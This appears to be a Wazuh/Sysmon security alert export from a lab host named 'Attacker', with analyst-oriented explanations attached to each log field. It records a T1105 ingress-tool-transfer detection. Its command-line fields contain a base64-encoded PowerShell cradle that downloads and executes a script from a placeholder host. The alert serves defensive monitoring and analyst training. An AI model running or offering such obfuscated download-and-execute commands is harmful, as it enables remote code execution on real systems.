data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1c3-680a-140d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16876
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:13.816+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:13.816+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  146
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535433.2996471
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:11.7142281Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351212
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:57:11.664 ProcessGuid: {94294ddc-c1c6-680a-160d-000000000e00} ProcessId: 8744 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5j1irpdl.sgx.ps1 CreationUtcTime: 2025-04-24 22:57:11.664 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:57:11.664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1c6-680a-160d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8744
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5j1irpdl.sgx.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:57:11.664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions